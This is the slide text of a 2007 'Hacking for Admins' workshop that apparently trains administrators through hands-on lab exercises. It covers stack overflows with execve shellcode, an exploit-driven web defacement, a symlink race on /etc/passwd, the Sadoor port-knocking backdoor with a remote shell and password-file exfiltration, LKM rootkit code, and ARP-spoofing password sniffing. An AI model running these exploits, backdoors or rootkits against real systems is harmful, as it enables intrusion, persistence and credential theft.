Gaining Access
-- Buffer Overflow --
➤ Stack Based Buffer Overflows
➤ Off-by-One Overflows
➤ Frame Pointer Overwrites
➤ BSS Overflows
➤ Heap Overflows
01./02.02.2007 linuxdays.lu 2007 44
Gaining Access
-- Stack Based Buffer Overflow --
➤ C/C++ problem
➤ programming error
➤ Copy to much variable user input into fixed sized buffer
#include <stdio.h>
int main()
{
char name[31];
printf("Please type your name: ");
gets(name);
printf("Hello, %s", name);
return 0;
}
Buffer overflow occur if you enter
`1234567890123456789012345678901234567890`
01./02.02.2007 linuxdays.lu 2007 45
Gaining Access
-- Stack Based Buffer Overflow --
Exploitation:
-- Missing bounds checking
-- Mutiple „unsafe“ functions in libc
-- Executing code in the data/stack segment
-- Creating the to be feed to the application
Memory layout of a process:
Code
Data
Stack high address
low address
no ‘execution’ attribute set
‘read-only’ attribute
LIFO – top of the stack
BSS
Heap
01./02.02.2007 linuxdays.lu 2007 46
Gaining Access
-- Stack Based Buffer Overflow --
-- Stack holding all the information for the function
-- Stack is created at the beginning of a function
-- Stack is released at the end of a function
-- LIFO mechanism to pass arguments to
functions and to reference local variables
void
function (void)
{
[ ... ]
}
int
main (void)
{
int a;
function (argv[1])
[ ... ]
}
Stack
Frame 1
Frame 2 EBP
ESP
EIP: Extended Instruction Pointer
EBP: Extended Base Pointer
ESP: Extended Stack Pointer
POP
PUSH
- function parameters
- local variables
- data to recover previous frame
01./02.02.2007 linuxdays.lu 2007 47
Gaining Access
-- Stack Based Buffer Overflow --
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
Stack
function ()
Frame 2
main ()
Frame 1
Return Address
1
2
3
SFP
4
local variables
buff[512]
args
EIP: Extended Instruction Pointer
EBP: Extended Base Pointer
ESP: Extended Stack Pointer
SFP
saved registers
local variables
ESP
saved registers
args
EBP
EIP
Return Address EIP
01./02.02.2007 linuxdays.lu 2007 48
Gaining Access
-- Stack Based Buffer Overflow --
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
Stack
1
2
3
4
buff[512]
5
Wrong Return
SFP
args
EBP
saved registers
local variables
saved registers
args
function ()
Frame 2
main ()
Frame 1
Return Address
01./02.02.2007 linuxdays.lu 2007 49
Gaining Access
-- Stack Based Buffer Overflow --
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
1
2
3
456
Stack
buff[512]
SFP
args
EBP
saved registers
local variables
saved registers
args
function ()
Frame 2
main ()
Frame 1
Wrong Return
Return Address
01./02.02.2007 linuxdays.lu 2007 50
Gaining Access
-- Stack Based Buffer Overflow --
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
Stack
0x0A00
1
2
3
456
0x0800
0x0A00
shellcode 0x0C00
shellcode
nop
nop
0x0A00
0x0A00
function () 0x0A00
Frame 2
main ()
Frame 1
01./02.02.2007 linuxdays.lu 2007 51
Gaining Access
-- Shellcode --
char linux_ia32_shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%a1 */
"\xcd\x80" /* int $0x80 */
Old school payload: bindshell, backconnect
01./02.02.2007 linuxdays.lu 2007 52
Gaining Access
-- Exercise: Web Site defacement --
$ cd /home/hamm/ssl/
$ ls –la
$ ./openSSL 0x73 192.168.22.21 443 –c 40
/usr/bin/whoami
echo "hacked by me….. " > /var/www/html/index.html
- Unprivileged user -> local user privileges escalation
01./02.02.2007 linuxdays.lu 2007 53
Gaining Access
-- Exercise: Web Site defacement --
What do we see on the Firewall???
01./02.02.2007 linuxdays.lu 2007 54
Gaining Access
primary target webserver
-- why they are so vulnerable --
➤complex application
➤multiple subsystems:
application server, scripts, sql-server
➤self made applications:
programmers don’t know how to write secure code
➤Shell-Command-Injection:
bypass commands through the shell
Input: "Alice; rm - rf"
➤SQL-Injection
bypass SQL Commands by User input
Input: "User=Alice' -&Pass=Idontknow"
01./02.02.2007 linuxdays.lu 2007 55
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 56
Maintaining Access
-- be silent --
➤after a successful initial attack
➤ hide the tracks from logfiles
➤ expand local rights; find vulnerabilities in network
➤ install rootkits, steal password database, start
network sniffer
➤ try same password on other systems
➤ find problems in topology (ex. dual homed hosts)
➤ try to attack the private network
01./02.02.2007 linuxdays.lu 2007 57
Maintaining Access
Privileges Escalation
-- Race Condition --
what could I try to attack?
- SUID / SGID binaries
find / -perm –4000 –type f –user root –print
find / -perm –2000 –type f –group root –print
- privileged process
- Kernel
- password file
Source of problems?
- configuration error
- local software vulnerabilities
-- buffer overflow
-- race condition
-- format string
01./02.02.2007 linuxdays.lu 2007 58
Maintaining Access
Privileges Escalation
-- example: race_bug --
#include <stdio.h>
#include <unistd.h>
int
main (int argc, char *argv[])
{
char path[] = "/tmp/race.txt"
FILE *fp;
fp = fopen (path, "a+");
fprintf (fp, "%s\n", argv[1]);
fclose (fp);
unlink (path);
return 0;
}
01./02.02.2007 linuxdays.lu 2007 59
Maintaining Access
Privileges Escalation
-- example: race_bug --
Prepare attack
$ cd /home/hamm/race
$ ls –la
$ ./race_bug test
$ ls –la /tmp
$ cat /etc/passwd
$ su -; cp /etc/passwd /etc/passwd.bak; exit
Attak:
$ ln –s /etc/passwd /tmp/race.txt
$ ls –la /tmp
$ cat command
$ ./command
$ ls –la /tmp
$ cat /etc/passwd
$ su – bimbam
# id
01./02.02.2007 linuxdays.lu 2007 60
Maintaining Access
Privileges Escalation
-- Exercise: privileges escalation --
$ su –
# cd /home/hamm/ssl/
# ls –la
# cp p /tftpboot
# /etc/init.d/atftpd start
# exit
$ ./openSSL 0x73 192.168.22.21 443 –c 40
/usr/bin/whoami
pwd
/usr/bin/tftp 192.168.22.1
mode binary # local root exploit
get p # kernel 2.2.x 2.4.x
quit
ls –l
chmod +x p
ls –l
./p
whoami
01./02.02.2007 linuxdays.lu 2007 61
Maintaining Access
Port Knocking
-- introduction --
Aka Port Knocking Back Door
- Open Port?????
- no promisc mode, no open ports
- raw sockets
- trigger for special packets to get activated
- attacker:
-- send trigger pkg1
-- send trigger pkg2
-- send trigger pkg3
-- send command pkg1
- example: Sadoor
http://cmn.listptojects.darklab.org
Port 80, 443 open; statefull
01./02.02.2007 linuxdays.lu 2007 62
Maintaining Access
Port Knocking
-- Sadoor example --
Sadoor daemon configuration: /etc/sadoor/sadoor.pkts
# key 1
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
icmp {
type = 8;
}
}
}
# key 2
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
tcp {
flags = SYN;
dport = 80;
sport = 3456;
}
}
}
01./02.02.2007 linuxdays.lu 2007 63
Maintaining Access
Port Knocking
-- Sadoor example --
Sadoor daemon configuration: /etc/sadoor/sadoor.pkts
# key 3
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
udp {
dport = 111;
data { bim\x20bam }
}
}
}
# command
cmdpkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
tcp {
sport = 80;
sport = 12345;
}
}
}
01./02.02.2007 linuxdays.lu 2007 64
Maintaining Access
Port Knocking
-- Sadoor example --
Create a config-image database
and download it to /home/hamm/.sash
mksadb
mv sadoor.db /var/www/html/
chmod 644 /var/www/html/sadoor.db
Run the daemon
/usr/sbin/sadoor
Review logging
tail –f /etc/sadoor/sadoor.log
01./02.02.2007 linuxdays.lu 2007 65
Maintaining Access
Port Knocking
-- Sadoor example --
ON CLIENT side:
1. Download http://testwww.mumm.lu/sadoor.db
2. become root
cd
cd .sash
mv /home/hamm/sadoor.db .
sadbcat sadoor.db sash.db # create encrypted db
rm –f sadoor.db # delete plain sequence
3. Sending commands
sash 192.168.22.24 \
–vv –r "cat /etc/passwd > /var/www/html/test.txt"
sash 192.168.22.24 "chmod 644 /var/www/html/test.txt"
4. Establish a connection / remote shell
sash 192.168.22.24 –vv
sh-2.05b# whoami
sh-2.05b# /sbin/ifconfig
sh-2.05b# exit
01./02.02.2007 linuxdays.lu 2007 66
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 67
Clearing Tracks
Rootkits
-- introduction --
Main goals of a rootkit:
- hide activities of an attacker to the legal administrator
-- active processes
-- directories & files
-- network activities
- provide a backdoor to the system
- let the attacker become root whenever he want
- collect sensitive data
-- from network
-- from user input
01./02.02.2007 linuxdays.lu 2007 68
Clearing Tracks
Rootkits
-- introduction --
1th generation: Binary Rootkits
- replace important system tools by modified versions:
-- du(1), locate(1), netstat(1), ps(1), top(1),
-- ifconfig(1), w(1), who(1), …..
- defined parameters will become invisible in the future:
-- IP Addresses
-- directories & files
-- usernames
- easy to discover:
-- by filesystem inegrity checker: -- tripwire, -- aide
- examples: Irk3-6, (Linux), Fbrk (FreeBSD), Solaris Rootkit
01./02.02.2007 linuxdays.lu 2007 69
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits
- expand the functionality of the kernel
- can be loaded dynamically: insmod(3), rmmod(3)
- implemented as device driver
-> high level of flexibility
- implementations:
-- new modules
-- infecting existing modules
- result: trojaned kernel à full control over all userland apps.
01./02.02.2007 linuxdays.lu 2007 70
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits
- syscalls: a gate between userland and kernel
- example for syscalls: trace /bin/ls
execve(…
uname(…
brk(0)
old_mmap(…
access(…
open(…
open(…
……
01./02.02.2007 linuxdays.lu 2007 71
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits
- normal syscall:
parameter into
registers int 80
selection of the
interrupt handler
Interrupt handler:
syscall selection
Exec syscall
example: mkdir
Userland
Kernel
Interrupt Descriptor Table
(IDT)
Syscall Table
01./02.02.2007 linuxdays.lu 2007 72
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits
- manipulated syscall:
parameter into
registers int 80
selection of the
interrupt handler
Interrupt handler:
syscall selection
Exec syscall
example: mkdir
Userland
Kernel
Interrupt Descriptor Table
(IDT)
Syscall Table
Exec syscall
manipluated: mkdir
01./02.02.2007 linuxdays.lu 2007 73
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM Rootkit: Exercise: mkdir_Rootkit
#define MODULE /* the new mkdir syscall */
#define __KERNEL__ int hack_mkdir (const char *path) {
printk ("BimBam!\n");
#include <linux/module.h> return 0;
#include <linux/version.h> }
#include <linux/kernel.h>
#include <sys/syscall.h> int init_module (void) {
#include <stdio.h> orig_mkdir=sys_call_table[SYS_mkdir];
sys_call_table[SYS_mkdir]=hack_mkdir;
MODULE_LICENSE("GPL"); return 0;
}
/* import syscall table */
extern void *sys_call_table[]; void cleanup_module (void) {
sys_call_table[SYS_mkdir]=hack_mkdir;
/* dummy for old mkdir syscall */ }
int (*orig_mkdir) (const char *path);
01./02.02.2007 linuxdays.lu 2007 74
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM Rootkit: Exercise: mkdir_Rootkit
cd /root/rootkit/mkdir
gcc –c –I /usr/src/linux/include mkdir.c
insmod mkdir.o
lsmod
mkdir test
ls –la
cat /var/log/messages
rmmod mkdir
lsmod
mkdir test
ls –la
Clearing Tracks
Root kits
-- introduction --
2th generation: LKM Rootkit: Adore
cd /root/rootkit/adore/
insmod adore.o
lsmod
insmod cleaner.o
lsmod
rmmod cleaner
lsmod
ps aux | grep ssh
./ava i <PID SSHD>
ps aux | grep ssh
netstat –punta | grep 22
mkdir /root/rootkit/bimbam
./ava h /root/rootkit/bimbam
ls –la /root/rootkit
./ava –U dummy
01./02.02.2007 linuxdays.lu 2007 76
Clearing Tracks
Rootkits
-- introduction --
3th generation: (Virtual File System) VFS Layer Rootkit
- sys_call_table is not exported anymore
-- Red Hat 8.0 (Kernel 2.4.18)
-- Kernel 2.5.41 à
- all Syscalls which access the Filesystem make use of
the Virtual File System
- in Unix, most of all is handled like a file
- existing Handler-Routines are replaced by modified one
à files/folder could be hidden
à via /proc hidding of processes
01./02.02.2007 linuxdays.lu 2007 77
Clearing Tracks
Rootkits
-- introduction --
3th generation: (Virtual File System) VFS Layer Rootkit
parameter into
registers int 80
selection of the
interrupt handler
Interrupt handler:
syscall selection
Userland
Kernel
Interrupt Descriptor Table
(IDT)
Syscall Table
ext2/ ext3/ ...
VFS
Syscall
01./02.02.2007 linuxdays.lu 2007 78
Hacking Techniques
Insider Attacks
01./02.02.2007 linuxdays.lu 2007 79
Insider Attacks
-- Password Sniffing true a Switch --
Default Gateway
IP: 10.10.10.1
MAC: 11:11:11:11:11:11
IP: 10.10.10.99
MAC: 99:99:99:99:99:99
Attacked PC
IP: 10.10.10.2
MAC: 22:22:22:22:22:22
ARP Reply IP 10.10.10.1 MAC 99:99:99:99:99:99
No gratuitous ARP, BUT directed ARP:
ETHERNET II
Dst: 22:22:22:22:22:22
SRC: 99:99:99:99:99:99
ARP reply:
Sender IP addr: 10.10.10.1
Sender MAC addr: 99:99:99:99:99:99
01./02.02.2007 linuxdays.lu 2007 80
Insider Attacks
-- Password Sniffing true a Switch --
Telnet Client:
IP: 192.168.3.3
IP: ___.___.___.___
Telnet Server:
IP: 192.168.3.4
IP: ___.___.___.___
Exercise:
1. echo 1 > /proc/sys/net/ipv4/ip_forward
2. arpspoof –i eth0 –t 192.168.4.30 192.168.4.28
3. dsniff -cn
Attacker:
IP: 192.168.3.2
MAC: 00:08:74:B3:BB:F1
IP: ___.___.___.___
MAC: __:__:__:__:__:__
01./02.02.2007 linuxdays.lu 2007 81
Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --
SSH Server:
IP: 192.168.3.3
DNS Server:
IP: 158.64.4.
Default Gateway:
IP: 192.168.3.1
Attacker:
IP: 192.168.3.2
Target: SSH Client:
IP: 192.168.3.xx
DNS Response (server_xyz.lu, 192.168.3.2)
DNS Query (HOST: server_xyz.lu)
01./02.02.2007 linuxdays.lu 2007 82
Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --
01./02.02.2007 linuxdays.lu 2007 83
Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --
SSH Server:
IP: 192.168.3.3
DNS Server:
IP: 158.64.4.
Default Gateway:
IP: 192.168.3.1
Attacker:
IP: 192.168.3.2
Target: SSH Client:
IP: 192.168.3.xx
01./02.02.2007 linuxdays.lu 2007 84
Hacking for Admins
by


Shankha {Fainted Brain}